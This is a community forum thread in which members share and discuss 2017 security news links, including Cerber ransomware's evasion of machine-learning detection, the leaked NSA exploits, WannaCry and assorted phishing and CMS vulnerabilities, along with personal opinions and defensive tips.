As a threat, Cerber has already been blocked by earlier advances in security solutions. Running Cerber in a normal process (as done by the loader) can help evade behavioral monitoring, but why go to the trouble of repackaging Cerber and using a separate loader? Earlier versions of Cerber already had a code injection routine which could mimic that particular behavior, so why was the separate loader necessary?
The answer lies in the adoption of the security industry of machine learning solutions. The industry has created features to proactively detect malicious files based on features instead of signatures. The new packaging and loading mechanism employed by Cerber can cause problems for static machine learning approaches–i.e, methods that analyze a file without any execution or emulation.
Self-extracting files and simple, straightforward files could pose a problem for static machine learning file detection. All self-extracting files may look similar by structure, regardless of the content. Unpacked binaries with limited features may not look malicious either. In other words, the way Cerber is packaged could be said to be designed to evade machine learning file detection. For every new malware detection technique, an equivalent evasion technique is created out of necessity.
This new evasion technique does not defeat an anti-malware approach that uses multiple layers of protection. Cerber has its weaknesses against other techniques. For instance, having an unpacked .DLL file will make it easy to create a one-to-many pattern; alternately having a set structure within an archive will make it easier to identify if a package is suspicious. Solutions that rely on a variety of techniques, and are not overly reliant on machine learning, can still protect customers against these threats.
-
That is what I said they don't exactly bypass the machine learning so the title of the blog post is kind of misleading and self contradictory. You are right with the highlighted statements of course :)
-
That is what I said they don't exactly bypass the machine learning so the title of the blog post is kind of misleading and self contradictory. You are right with the highlighted statements of course :)
It could be (meaning) it is dependent on AV product?
-
It could be (meaning) it is dependent on AV product?
Of course yes.... in this case not avast (at least this time) thanks to the improvements on the back end and their lab.
Most AV's are not traditional anymore.
Antivirus is Evolving and will be Evolving forever. :)
-
PyCL Ransomware Delivered via RIG EK in Distribution Test By Lawrence Abrams
https://www.bleepingcomputer.com/news/security/pycl-ransomware-delivered-via-rig-ek-in-distribution-test/ (https://www.bleepingcomputer.com/news/security/pycl-ransomware-delivered-via-rig-ek-in-distribution-test/)
-
Zero-day hole in Microsoft IIS 6.0 (no longer being supported) actively attacked:
http://blog.trendmicro.com/trendlabs-security-intelligence/iis-6-0-vulnerability-leads-code-execution
Re: hole is found in Webdav: https://nl.wikipedia.org/wiki/Webdav
Newer versions of the server software are not vulnerable.
polonus
-
Broadband rules axed by Congress, headed to Trump
http://www.usatoday.com/story/tech/news/2017/03/28/broadband-rules-axed-congress-headed-trump/99744078/
Please, no political statements.
-
Please, no political statements.
D'oh! :-X that is a tuff one ;D
-
Please, no political statements.
D'oh! :-X that is a tuff one ;D
Very tough when the article is political ;)
-
Please, no political statements.
D'oh! :-X that is a tuff one ;D
Very tough when the article is political ;)
Especially when the bill is still a holdover from Obama. :)
-
From now on, we'll all be using a VPN. for now, that'll work.
I rely on the one from Avast. If that's not an option,
Get Opera and activate the VPN service in settings > Security & Privacy. :)
-
Hi bob3160,
And what will that mean for the Privacy Shield agreement with the EU,
or will the "old continent" comply to this with not much further ado,
and agree to the new situation, so that all of your data online may be sold to the highest bidder.
As there ever was an end to privacy, then now that moment has arrived.
What you said all along, bob3160, that: "Privacy does not exist any longer"
seems to have been prophetic words here".
Damian
-
Hi bob3160,
And what will that mean for the Privacy Shield agreement with the EU,
or will the "old continent" comply to this with not much further ado,
and agree to the new situation, so that all of your data online may be sold to the highest bidder.
As there ever was an end to privacy, then now that moment has arrived.
What you said all along, bob3160, that: "Privacy does not exist any longer"
seems to have been prophetic words here".
Damian
Something elseto read:
http://lifehacker.com/why-is-everyone-talking-about-vpns-1793768312?utm_source=lifehacker_newsletter&utm_medium=email&utm_campaign=2017-03-29
-
Dear bob3160,
Just watch this: https://www.youtube.com/watch?v=qAT_ina93NY
Very actual now....
Damian
-
Dear bob3160,
Just watch this: https://www.youtube.com/watch?v=qAT_ina93NY (https://www.youtube.com/watch?v=qAT_ina93NY)
Very actual now....
Damian
Now if you realize that this video is 3 years old, imagine just how much more
of your privacy has been lost for ever.
I've preached for years that there is no such thing as personal privacy. Maybe this video and,
the current proposed legislation, makes that statement hit home.
-
Verizon is going to install spyware onto your Android-device:
https://www.verizon.com/about/privacy/appflash-privacy-policy
Why this bad, read:
https://www.eff.org/deeplinks/2017/03/first-horseman-privacy-apocalypse-has-already-arrived-verizon-announces-plans
More generally on Data-Jacking: http://www.darkreading.com/the-era-of-data-jacking-is-here-are-you-ready-/a/d-id/1328173
polonus
-
Adware vs. ad fraud
https://blog.malwarebytes.com/cybercrime/2017/03/adware-vs-ad-fraud/?utm_source=double-opt-in&utm_medium=email-internal-b2c&utm_campaign=EM-B2C-2017-March-newsletter-issue2&utm_content=adware-vs-adfraud
-
Less secure bootstrap in the CloudFlare/GoDaddy clouds!
Issues with bootstrap
Found with SRI-hash issues in Stylesheets: https://sritest.io/#report/144f10cc-d705-4ef7-b513-46edbfa469d1
CloudFlare GoDaddy abuse - The getbootstrap.com server is vulnerable to:
Heartbleed also has problems with TLS:
Common name:
-sni49733.cloudflaressl.com Comodo certificate chain ECC Domain Validated Secure Server & -sni49733.cloudflaressl certificate
SAN:
-sni49733.cloudflaressl.com, *.-amazinghunters.com, *.-avhipo.com, *.-bloggbyran.cf, *.-brakeingasout.com, *.-caketopia.eu, *.-egedenbutiklezzetler.com, *.-erwinolie.nl, *.-femclick.com, *.f-rankl.computer, *.-fren.us, *.-getbootstrap.com, *.-ghbtns.com, *.-hncuyelik.com, *.-hockeyed.com, *.-mobile4bizz.net, *.-nokiacamera.com, *.-secstories.com, *.-therecruit.zone, *.-thewareaglereader.com, *.-tickat636.ga, *.-zoekeenfietsenmaker.nl, -amazinghunters.com, -avhipo.com, -bloggbyran.cf, -brakeingasout.com, -caketopia.eu, -egedenbutiklezzetler.com, -erwinolie.nl, -femclick.com, -frankl.computer, -fren.us, - getbootstrap.com, -ghbtns.com, -hncuyelik.com,-hockeyed.com, -mobile4bizz.net, -nokiacamera.com, -secstories.com, -therecruit.zone, -thewareaglereader.com, -tickat636.ga, -zoekeenfietsenmaker.nl
Re: http://toolbar.netcraft.com/site_report?url=http%3A%2F%2Fgetbootstrap.com
See: https://urlscan.io/result/bb7dec19-4186-4864-b722-ac2989f663fb#summary
F-F-X status: https://observatory.mozilla.org/analyze.html?host=getbootstrap.com
MISSING MANDATORY CIPHERS for TLS: https://www.htbridge.com/ssl/?id=11fdf72a57bff6ed97fd176c0f1c23985b6a10e99247c7b70b52025f396e05ca
and other misconfigurations and weaknesses (mixed content and https redirect)
Seems from this report that the American infrastructure does not have that secure e2e encryption we are being led to believe,
this is endangering the average users that make use of such services.
polonus (volunteer website security analyst and website error-hunter)
-
Marble a very dangerous CIA Malware Obfuscation/Deobfuscation tool.
Through Marble CIA could insert obfuscated txt and deobfuscate txt later to mask the origins of malware.
The tool could be used for instance to blame the Russians for something and then later take off the evidence and then in return blame the Chinese, or whatever the 'spooks had in store for us all.
This dangerous malware tool made everyone''s infrastructure less secure to protect the interests of less than 1% of the global population.
Being a linguist myself I wonder whether analytical analysis of the inserted txts could show up inconsistencies in the language inserted, so it can be shown where the malware manipulation was being performed (Langley Virginia, Frankfurt Germany Europe).
Comparative linguistics looking for missspellings, wrong use of grammar rules. In Poland we say prverbially: "Lies have short legs".
Are we as online users being protected against such "cloak and dagger" schemes or does AV have to refrain from analysing further
under existing "gag orders", we will never come to know.
Read comments: https://news.ycombinator.com/item?id=14006059
-
A nice file viewer, very helpful in the analysis of potentially suspicious or malicious websites has become under fire from the DMCA
017/04/01 08:15:08 Note: One of those DMCA actions has been filed against this scanner, an issue about one of the javascript algos I use. Now my hosting service is telling me with a DMCA the URL, i.e. this scanner, has to be taken down until the DMCA is resolved. The whole DMCA thing is a bunch of legalese (which I don't begin to understand) so I (my hosting service) will be taking the scanner down while I seek legal assistance. Thank you for your patience while I try to resolve.
Having they got better things to do than keeping us all more insecure ::)
The global Internet security infrastructure apparently has become under attack from the "forces that be", in particular Big Monetizers.
Hopefully this is an April First Joke. ;)
polonus
-
Too late to change our minds about LastPass:
A fundamental bug that will make many stop using LastPass. One could change to Dashlane. The only relevant closed source pwmanagers now are 1Password and Dashlane. The only free one that stays is KeePass. All such 3 pwmanagers work have another underlaying mechanism that Lastpass. But remember what Ormandy remarked on KeePass iearlier:
(In chronological order)
https://twitter.com/taviso/status/758122674316906496
https://twitter.com/taviso/status/763801055725359104
https://twitter.com/taviso/status/769581755502166017
https://twitter.com/taviso/status/817065731703468032
https://twitter.com/taviso/status/843242496448577536
White hat hackers remain a threat to every password manager!
pol
-
Hi Pol, Avast Passwords is also free. ;)
-
RoboForm 8.x is also free for single user computer use
-
Maker of smart garage door opener bricks customer’s device in retaliation for negative review
https://www.extremetech.com/internet/247127-maker-iot-garage-door-opener-bricks-customers-device-retaliation-negative-review
-
BrickerBot may ruin your ill-protected IoT-device:
Read: https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/
You may check your security here: https://iotscanner.bullguard.com/deep-scan-completed
pol
-
Maker of smart garage door opener bricks customer’s device in retaliation for negative review
https://www.extremetech.com/internet/247127-maker-iot-garage-door-opener-bricks-customers-device-retaliation-negative-review
Tsk Tsk. Another reason to use the old muscle routine to get things done.
-
Maker of smart garage door opener bricks customer’s device in retaliation for negative review
https://www.extremetech.com/internet/247127-maker-iot-garage-door-opener-bricks-customers-device-retaliation-negative-review
Tsk Tsk. Another reason to use the old muscle routine to get things done.
There really are times when I think reinventing the wheel isn't the way to go when the existing solution is working without adding risk.
Lets say you don't have a garage door opener. The first part of the equation is getting a motor powerful enough to raise the door or replace the door. The people that supply those doors are highly likely to provide the remote key fob device to open it.
So who needs more tech do do something that can already be done making something that already does the job redundant. Or even more depriving the car owner of a little exercise.
-
Shun it, Ask dot com bleed: https://twitter.com/hanno/status/850283638667317248
pol
-
Dridex Campaigns Hitting Millions of Recipients Using Unpatched Microsoft Zero-Day
https://www.proofpoint.com/us/threat-insight/post/dridex-campaigns-millions-recipients-unpatched-microsoft-zero-day
-
Let's Encrypt and Comodo Certificates abused for PHISHING.
Read: https://news.netcraft.com/archives/2017/04/12/lets-encrypt-and-comodo-issue-thousands-of-certificates-for-phishing.html
polonus
P.S. This news is not completely neutral as Netcraft is also in the EV-Certificate business, so this news might not be completely without biass.
D.
-
Mole Ransomware Distributed Through Fake online Word Docs
Unfortunately, at this time there is no way to currently decrypt files encrypted by Mole for free.
https://www.bleepingcomputer.com/news/security/mole-ransomware-distributed-through-fake-online-word-docs/ (https://www.bleepingcomputer.com/news/security/mole-ransomware-distributed-through-fake-online-word-docs/)
-
https://blog.avast.com/a-deeper-look-into-malware-abusing-teamviewer (https://blog.avast.com/a-deeper-look-into-malware-abusing-teamviewer)
-
Magento Zero Day 200.000 webshops at risk :o
Re: http://blog.defensecode.com/2017/04/high-risk-0-day-vulnerability-found-in.html
Check your local Magento community for affected sites, example: https://www.dutchento.org/showcases/
polonus
-
https://theintercept.com/2017/04/14/leaked-nsa-malware-threatens-windows-users-around-the-world/
NSA's exploit tools are out in the open.Leaked by shadowbrokers hacker group.
-
https://theintercept.com/2017/04/14/leaked-nsa-malware-threatens-windows-users-around-the-world/
NSA's exploit tools are out in the open.Leaked by shadowbrokers hacker group.
What if NSA have leaked this on purpose, that would be a neat trick
And they now log info from lots of bad guys / goverments .... hmmm 8)
-
This is essentially a big archive of exploits and dirty programs. ODDJOB, ZIPPYBEER, and ESTEEMAUDIT, capable of breaking into — and in some cases seizing control of — computers running version of the Windows operating system.
FUZZBUNCH is the crown jewel here it is used by NSA to deploy any exploit in their arsenal.Here is a screenshot of the exploits from fuzbunch that can be used.
-
Hi True Indian,
NSA is trying to turn the tables on the Internet, turning it into a panopticon of sorts.
Even tor source developers are being asked to cooperate just so to allow NSA to get access to meta-data and mail-content
(recently for example with German tor-developer, Hahn).
There will always be some Judas, that will sell his internet soul for a "proverbial thirty silverlings", just to follow the Easter Story.
NSA divides users in two categories. Those users that can be brought easily under mass surveillance without further ado. They fall victim to normal dragnet procedures.
And a second category of users that knows how to protect themselves and their privacy. This latter category will directly come under scruteny by such services (users that use tor and tails for instance or visit here: https://www.resetthenet.org/ ).
Protection for that second category of end-users will become harder and harder (recently with plans to use one and the same browser engine for all major browser flaws (Edge, firefox and Google's chrome) and so a one mono-culture of extension-api for them all). It is a pity not all Internet users are aware of this insecure status "by design" of the Internet as we have it now. From an information exchange medium it was slowly turned into a 'grab more of that money' machine.
The average user just thinks, when it all functions, it is OK. Then in a ,lot of cases he, she or it may be completely wrong.
polonus
-
According to Microsoft most of these NSA exploits were being patched: https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/
Four exploits were not being patched until one month ago.
For users of Windows XP, Server 2003 and Vista this is a completely different story, they run risks even with EnglishmanDentist, EsteemAudit en ExplodingCan and all other unpatched exploits.
Remember, that running surveillance exploits against the general public has beenan ongoing practice since 2001.
Targeted attacks cannot even be evaluated (watering place attaks etc.).
polonus
-
Its a mystery as to how MS patched these vulnerabilities a month ago before this was even leaked. ???
-
Not really a mystery if it was leaked to them first. :)
-
Not really a mystery if it was leaked to them first. :)
MS has not given any statement on the above yet or they just don't want to!
There are no acknowledgements for MS17-10 which patched most of the big bugs from the ShadowBrokers drop.
According to Mr.Snowden,he doesn't believe that this is all NSA has and he says there are more unknown exploits like these that NSA never bothers to reveal but instead use it to spy.
-
Oracle patches Solaris 10 hole exploited by NSA spyware tool – and 298 other security bugs
http://www.theregister.co.uk/2017/04/19/oracle_april_security_patches_nsa/
-
That apple.com link you clicked on? Yeah, it's actually Russian
http://www.theregister.co.uk/2017/04/18/homograph_attack_again/
-
'Nobody's got to use the internet,' argues idiot congressman in row over ISP privacy rules
https://www.theregister.co.uk/2017/04/17/sensenbrenner_blunder_after_privacy_criticism/
-
120.000 Drupal-websites exploitable by hole in module with left code: https://www.drupal.org/project/usage/references
Drupal is now seen waiting for a new maintainer 2017-04-14 - A potential new maintainer is working through the process of fixing the References module. When this is complete a new release will be published and this SA will be updated
Unsuported modules is not the way to go forward, guys :o
polonus
-
100.000 servers infested with 'leaked' NSA government malware: http://blog.binaryedge.io/2017/04/21/doublepulsar/
Especially where older Windows servers are being used globally, these risk have not been mitigated (Windows 2006 server foir instance) and the NSA exploit holes haven't been patched. In the Netherlands a 1300 servers showed to have been affected.
Normally NSA should remove the malware and all traces of it, but sometimes the spooks get sloppy and do not abide by their own stringent rules. So eventually their schemes are detected and some can take counter-measures.
Good for law-abiding citizens that should be left alone.
polonus
-
Related to Chrome / Opera / Firefox
Phishing with Unicode Domains >> https://www.xudongz.com/blog/2017/idn-phishing/
IDN in Google Chrome >> https://www.chromium.org/developers/design-documents/idn-in-google-chrome
IDN homograph attack > https://en.wikipedia.org/wiki/IDN_homograph_attack
Punycode > https://en.wikipedia.org/wiki/Punycode
-
Homeland Security warns of 'BrickerBot' malware that destroys unsecured internet-connected devices
http://www.zdnet.com/article/homeland-security-warns-of-brickerbot-malware-that-destroys-unsecured-internet-connected-devices/
-
No more IP addresses for countries that shut down internet access
https://www.theregister.co.uk/2017/04/12/no_ip_addresses_for_countries/
-
Voice and face impersonation on the horizon, a brave new future we do not desire?
Re: https://www.theregister.co.uk/2017/04/24/voice_stealing_lyrebird/
pol
-
Voice and face impersonation on the horizon, a brave new future we do not desire?
Re: https://www.theregister.co.uk/2017/04/24/voice_stealing_lyrebird/
pol
Yea, human counterpart is to cold-call a victim and ask "Can you hear me?" and use the affirmative (recorded) answer to spoof your bank accounts and the like. Not kosher at all.
[EDIT:] Ahem, oops.
-
Pawn Storm: The Power of Social Engineering
http://blog.trendmicro.com/pawn-storm-power-social-engineering/
Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks
http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks/
A Storm’s a Coming: How businesses can defend against threat actor groups like Pawn Storm
http://blog.trendmicro.com/storms-coming-businesses-can-defend-threat-actor-groups-like-pawn-storm/
-
Those complaining about avast FP, it does happen to others also
AV provider Webroot melts down as update nukes hundreds of legit files
https://arstechnica.com/security/2017/04/av-provider-webroot-melts-down-as-update-nukes-hundreds-of-legit-files/
https://community.webroot.com/t5/Announcements/W32-Trojan-Gen-False-Positive-Fix-April-24/td-p/290198
-
Those complaining about avast FP, it does happen to others also
AV provider Webroot melts down as update nukes hundreds of legit files
https://arstechnica.com/security/2017/04/av-provider-webroot-melts-down-as-update-nukes-hundreds-of-legit-files/ (https://arstechnica.com/security/2017/04/av-provider-webroot-melts-down-as-update-nukes-hundreds-of-legit-files/)
https://community.webroot.com/t5/Announcements/W32-Trojan-Gen-False-Positive-Fix-April-24/td-p/290198 (https://community.webroot.com/t5/Announcements/W32-Trojan-Gen-False-Positive-Fix-April-24/td-p/290198)
It has happened to ALL AV's . It happens to Operating Systems etc.
It's especially nasty if it happens and you aren't prepared for this type of disaster.
Back up, Back up, Back up. :)
-
Cybercriminals use anti-virus exclusion lists to send malware where it may hurt most:
https://www.theregister.co.uk/2016/12/07/clever_crims_using_av_exclusion_lists_as_malware_safe_harbour/
APT attackers are better funded and conduct a lot of research before they launch attacks.
Be vigilant, folks.
polonus
-
Cybercriminals use anti-virus exclusion lists to send malware where it may hurt most:
https://www.theregister.co.uk/2016/12/07/clever_crims_using_av_exclusion_lists_as_malware_safe_harbour/
APT attackers are better funded and conduct a lot of research before they launch attacks.
Be vigilant, folks.
polonus
Hi Pol, a bit old (check the date), any reason to repost it..!?
-
Hi Asyn,
Probably a recent link at the Reg linking through to this. Meaning actually that it is still very actual news.
That is all I can think of as I did not search for 2016 content actually.
Damian
-
Close to 9,000 servers across Asean infected with malware
http://www.zdnet.com/article/close-to-9000-servers-across-asean-infected-with-malware/
-
Ongoing Cloud-Insecurity!
Spamhaus: Amazon and Google condone abuse.
Big CDNs leave malware botherder abuse going on for weeks on end, before starting to act against them.
Another sign of the dysfunctional insecurity of the global Internet Infrastructures.
And yup folks, something is fundamentelly insecure, maybe by design of vested interest.
( Italics = this is my personal opinion based on over 15 years of website insecurity scanning experience, polonus).
Read: https://www.spamhaus.org/news/article/736/botnet-controllers-in-the-cloud
polonus
-
Many Android Apps backdooring your Smartphone:
Read: https://www.wired.com/2017/04/obscure-app-flaw-creates-backdoors-millions-smartphones/
By essentially turning a phone into a server, they allow the owner to connect to that phone directly from their PC, just as they would to a web site or another internet service. But dozens of these apps leave open insecure ports on those smartphones. That could allow attackers to steal data, including contacts or photos, or even to install malware.
The world around you getting more dangerous every day, open ports on Androids where you do not expect it.
Can we be protected by Avast Mobile Security?
Only would be right when I gave you this link: http://www.yougetsignal.com/tools/open-ports/ (credits Kirk Ouimet)
pol
-
OSX Malware is Catching Up, and it wants to Read Your HTTPS Traffic
http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/
-
Diving into the darknet
https://blog.avast.com/diving-into-the-darknet (https://blog.avast.com/diving-into-the-darknet)
Is my microwave watching me? Top 5 steps to ensure it's not
https://blog.avast.com/microwave-watching-me-internet-things-security-top-steps-connected-safety (https://blog.avast.com/microwave-watching-me-internet-things-security-top-steps-connected-safety)
-
Antivirus Software Fails Basic Security Tests
http://www.tomsguide.com/us/antivirus-suites-vulnerable-exploits,news-25006.html
-
Google Phishing Attack: Gmail users hit by Massive Email Scam Sweeping Web
http://www.independent.co.uk/life-style/gadgets-and-tech/google-phishing-emails-attack-gmail-scam-link-doc-invitation-hack-a7716581.html
-
Google Phishing Attack: Gmail users hit by Massive Email Scam Sweeping Web
http://www.independent.co.uk/life-style/gadgets-and-tech/google-phishing-emails-attack-gmail-scam-link-doc-invitation-hack-a7716581.html (http://www.independent.co.uk/life-style/gadgets-and-tech/google-phishing-emails-attack-gmail-scam-link-doc-invitation-hack-a7716581.html)
An email with that senders email address was automatically put into my spam folder yesterday.
I need to check the spam folder since I quite often receive emails from people not on my contact list.
However checking what's in the spam folder and opening emails from unknown people are two different things.
For me, a lot of research goes into opening anything that's in the spam folder and this email certainly didn't live up to the requirements I've set to open something in the spam folder.
-
Cerber Version 6 Shows How Far the Ransomware Has Come (and How Far it’ll Go)
http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-ransomware-evolution/
-
Google Phishing Attack: Gmail users hit by Massive Email Scam Sweeping Web
http://www.independent.co.uk/life-style/gadgets-and-tech/google-phishing-emails-attack-gmail-scam-link-doc-invitation-hack-a7716581.html (http://www.independent.co.uk/life-style/gadgets-and-tech/google-phishing-emails-attack-gmail-scam-link-doc-invitation-hack-a7716581.html)
An email with that senders email address was automatically put into my spam folder yesterday.
I need to check the spam folder since I quite often receive emails from people not on my contact list.
However checking what's in the spam folder and opening emails from unknown people are two different things.
For me, a lot of research goes into opening anything that's in the spam folder and this email certainly didn't live up to the requirements I've set to open something in the spam folder.
If you did fall for this, you can reverse it. Here's how: https://lifehacker.com/how-to-secure-your-online-accounts-by-revoking-access-f-1794631133
-
Google Phishing Attack: Gmail users hit by Massive Email Scam Sweeping Web
http://www.independent.co.uk/life-style/gadgets-and-tech/google-phishing-emails-attack-gmail-scam-link-doc-invitation-hack-a7716581.html (http://www.independent.co.uk/life-style/gadgets-and-tech/google-phishing-emails-attack-gmail-scam-link-doc-invitation-hack-a7716581.html)
An email with that senders email address was automatically put into my spam folder yesterday.
I need to check the spam folder since I quite often receive emails from people not on my contact list.
However checking what's in the spam folder and opening emails from unknown people are two different things.
For me, a lot of research goes into opening anything that's in the spam folder and this email certainly didn't live up to the requirements I've set to open something in the spam folder.
If you did fall for this, you can reverse it. Here's how: https://lifehacker.com/how-to-secure-your-online-accounts-by-revoking-access-f-1794631133
I didn't get this email at all and I didn't fall for this. I am always cautions of who and what comes in my mail. If it's from an unknown sender it automatically goes in my spam folder. Thanks for the link
-
Windows backdoor malware disguises itself as Adobe Flash on macOS
https://9to5mac.com/2017/05/05/windows-backdoor-malware-disguises-itself-as-adobe-flash-on-macos/
-
Windows backdoor malware disguises itself as Adobe Flash on macOS
https://9to5mac.com/2017/05/05/windows-backdoor-malware-disguises-itself-as-adobe-flash-on-macos/ (https://9to5mac.com/2017/05/05/windows-backdoor-malware-disguises-itself-as-adobe-flash-on-macos/)
Does that mean there is more than one way to skin a Mac? :)
-
Mozilla: Future of a secure Internet Infrastructure at stake :
https://blog.mozilla.org/blog/2017/05/08/next-10-days-critical-internets-future/
The gutting of Internet's privacy in return for quite some lobbying sums:
https://www.fightforthefuture.org/news/2017-05-03-crowdfunded-billboards-appear-in-districts-of/
It is not developing into the right direction for end-user security, folks. :D
It could not have been better boom times for elitist globalists however. ;D
polonus
-
Mozilla: Future of a secure Internet Infrastructure at stake :
https://blog.mozilla.org/blog/2017/05/08/next-10-days-critical-internets-future/ (https://blog.mozilla.org/blog/2017/05/08/next-10-days-critical-internets-future/)
The gutting of Internet's privacy in return for quite some lobbying sums:
https://www.fightforthefuture.org/news/2017-05-03-crowdfunded-billboards-appear-in-districts-of/ (https://www.fightforthefuture.org/news/2017-05-03-crowdfunded-billboards-appear-in-districts-of/)
It is not developing into the right direction for end-user security, folks. :D
It could not have been better boom times for elitist globalists however. ;D
polonus
One of my favorite quotations:
"It's all about the money, honey."
-
Mirror Download Server Compromised [HandBrake for Mac]
https://forum.handbrake.fr/viewtopic.php?f=33&t=36364
-
https://tinyurl.com/l2426m6
Security flaw fix that is effecting all MS anti-malware software.
-
https://tinyurl.com/l2426m6 (https://tinyurl.com/l2426m6)
Security flaw fix that is effecting all MS anti-malware software.
If you don't like tinyurl,
https://technet.microsoft.com/en-us/library/security/4022344?ranMID=24542&ranEAID=TnL5HPStwNw&ranSiteID=TnL5HPStwNw-KdKC9eqcynmEu7ABclMOdQ&tduid=(ef8a4b93983af995464847ef51f0dec5)(256380)(2459594)(TnL5HPStwNw-KdKC9eqcynmEu7ABclMOdQ)()
-
Microsoft releases emergency patch for 'crazy bad' Windows zero-day bug
http://www.zdnet.com/article/microsoft-releases-emergency-patch-for-crazy-bad-windows-zero-day-bug/?loc=newsletter_small_thumb&ftag=TRE17cfd61&bhid=25195719670286873442005331614361
-
Posting about the enormous insecurity of a majority of WordPress sites for years now,
and finally I feel I am right: https://www.wordfence.com/blog/2017/05/22-abandoned-wordpress-plugins-vulnerabilities/
polonus (volunteer website security analyst and website error-hunter)
-
Change your Whatsapp settings, else all your private data are out in the street:
Read: https://www.allaboutphones.nl/whatsapp-privacy-hackers/ %
and play and discover: https://github.com/tgalal/yowsup
Facebook's reaction: they know about the insecurity features and it does not really bother them....
and then it does bother some and then they choose signal over Whatsapp.
polonus
-
Keylogger in audio driver from HP.
https://www.modzero.ch/modlog/archives/2017/05/11/en_keylogger_in_hewlett-packard_audio_driver/index.html
-
Read: https://www.theregister.co.uk/2017/05/12/googles_php_api_client_has_xss_vulnerability/
XSS vulnerabilities still unpatched in Google API code, read: https://markjaquith.wordpress.com/2009/09/21/php-server-vars-not-safe-in-forms-or-links/
polonus (volunteer website security analyst and website error-hunter)
-
WCry: Knowns And Unknowns
https://labsblog.f-secure.com/2017/05/13/wcry-knowns-and-unknowns/
Massive WannaCry/Wcry Ransomware Attack Hits Various Countries
http://blog.trendmicro.com/trendlabs-security-intelligence/massive-wannacrywcry-ransomware-attack-hits-various-countries/
WanaCrypt0r ransomware hits it big just before the weekend
https://blog.malwarebytes.com/cybercrime/2017/05/wanacrypt0r-ransomware-hits-it-big-just-before-the-weekend/
The worm that spreads WanaCrypt0r
https://blog.malwarebytes.com/threat-analysis/2017/05/the-worm-that-spreads-wanacrypt0r/
Symantec
https://www.symantec.com/connect/blogs/what-you-need-know-about-wannacry-ransomware
How is WannaCry spread?
While WannaCry can spread itself across an organization’s networks by exploiting a vulnerability, the initial means of infection—how the first computer in an organization is infected—remains unconfirmed. Symantec has seen some cases of WannaCry being hosted on malicious websites, but these appear to be copycat attacks, unrelated to the original attacks.
-
WannaCry
https://www.engadget.com/2017/05/15/pirated-windows-china-russia-wannacry/
https://www.engadget.com/2017/05/15/wannacry-ransomware-may-have-had-north-korean-code/
https://www.engadget.com/2017/05/14/wannacry-ransomware-evolves/
-
http://bob3160.blogspot.com/2017/05/wannacry-ransomeware-live-dont-get.html
-
WannaCry & The Reality Of Patching
http://blog.trendmicro.com/wannacry-reality-of-patching/
Why “Just Patch It!” Isn’t as Easy as You Think
http://blog.trendmicro.com/just-patch-isnt-easy-think/
-
PHISHING 33% up because of Brexit: https://www.theregister.co.uk/2017/02/07/phishing_trends/
pol
-
PHISHING 33% up because of Brexit: https://www.theregister.co.uk/2017/02/07/phishing_trends/ (https://www.theregister.co.uk/2017/02/07/phishing_trends/)
pol
Sounds like politics to me. :)
-
PHISHING 33% up because of Brexit: https://www.theregister.co.uk/2017/02/07/phishing_trends/
pol
I have seen lots of things being blamed on Brexit, but this is bloody ridiculous.
The Brexit vote was almost a year ago and almost anything malware related is going to go up year on year, crazy.
-
PHISHING 33% up because of Brexit: https://www.theregister.co.uk/2017/02/07/phishing_trends/ (https://www.theregister.co.uk/2017/02/07/phishing_trends/)
pol
Sounds like politics to me. :)
Political Phish you mean. ;D
-
PHISHING 33% up because of Brexit: https://www.theregister.co.uk/2017/02/07/phishing_trends/ (https://www.theregister.co.uk/2017/02/07/phishing_trends/)
pol
I have seen lots of things being blamed on Brexit, but this is bloody ridiculous.
The Brexit vote was almost a year ago and almost anything malware related is going to go up year on year, crazy.
Brexit and Trump, the blame for everything that's wrong in this world.
If you don't believe me just read the newspaper or look at the news. :)
-
PHISHING 33% up because of Brexit: https://www.theregister.co.uk/2017/02/07/phishing_trends/ (https://www.theregister.co.uk/2017/02/07/phishing_trends/)
pol
Sounds like politics to me. :)
Political Phish you mean. ;D
You're spelling pish wrong :D
-
Pictures say more ;D
-
BTCWare Ransomware Master Key Released, Free Decrypter Available
https://www.bleepingcomputer.com/news/security/btcware-ransomware-master-key-released-free-decrypter-available/ (https://www.bleepingcomputer.com/news/security/btcware-ransomware-master-key-released-free-decrypter-available/)
-
Steps for Window 10 system to set Port and prevent WannaCrypt attacking
https://goo.gl/u54N15
-
Steps for Window 10 system to set Port and prevent WannaCrypt attacking
https://goo.gl/u54N15
#
Thanks for that Bob.
-
Steps for Window 10 system to set Port and prevent WannaCrypt attacking
https://goo.gl/u54N15 (https://goo.gl/u54N15)
#
Thanks for that Bob.
Technically, it's the upd port that's the problem. If you see any programs not starting properly, you may want to bypass the tcp rule. :)
( I currently disabled the tcp rule on my system for that reasdon. )
-
Steps for Window 10 system to set Port and prevent WannaCrypt attacking
https://goo.gl/u54N15 (https://goo.gl/u54N15)
#
Thanks for that Bob.
Technically, it's the upd port that's the problem. If you see any programs not starting properly, you may want to bypass the tcp rule. :)
( I currently disabled the tcp rule on my system for that reason. )
Wise as TCP is more commonly used and I think I recall port 445 being used by other legit functions. So some would say that port was already being exploited, so it is difficult to say what action to take.
This port has been used by other malware in the past, see https://www.speedguide.net/port.php?port=445 (https://www.speedguide.net/port.php?port=445) for more information on this.
-
Chrome on Windows with credential theft bug: https://www.theregister.co.uk/2017/05/17/chrome_on_windows_has_credential_theft_bug/
polonus
-
WannaCry Ransomware Campaign: Threat Details and Risk Management
https://www.fireeye.com/blog/products-and-services/2017/05/wannacry-ransomware-campaign.html (https://www.fireeye.com/blog/products-and-services/2017/05/wannacry-ransomware-campaign.html)
-
Windows 10 credential theft: Google is working on fix for Chrome flaw
http://www.zdnet.com/article/windows-10-credential-theft-google-is-working-on-fix-for-chrome-flaw/
-
Again Word Press: https://wordpress.org/news/2017/05/wordpress-4-7-5/
This CMS will always be a disaster in the hands of those that do not know what to do and how to configure Word Press properly.
Many sites are very easily being compromised that way or can be infested any minute.
Look what could be wrong with a Word Press website here: https://hackertarget.com/wordpress-security-scan/
Eddy here and little old me also often meet: old software versions, old plug-in and vulnerable themes, outdated plug-ins or left code even. User Enumeration & Directory Listing enabled, iFrame issues, cloaking, not sticking to the so-called same origin rule, none or not the right security headers generated, no sri-hashes being generated and lots of other insecurity.
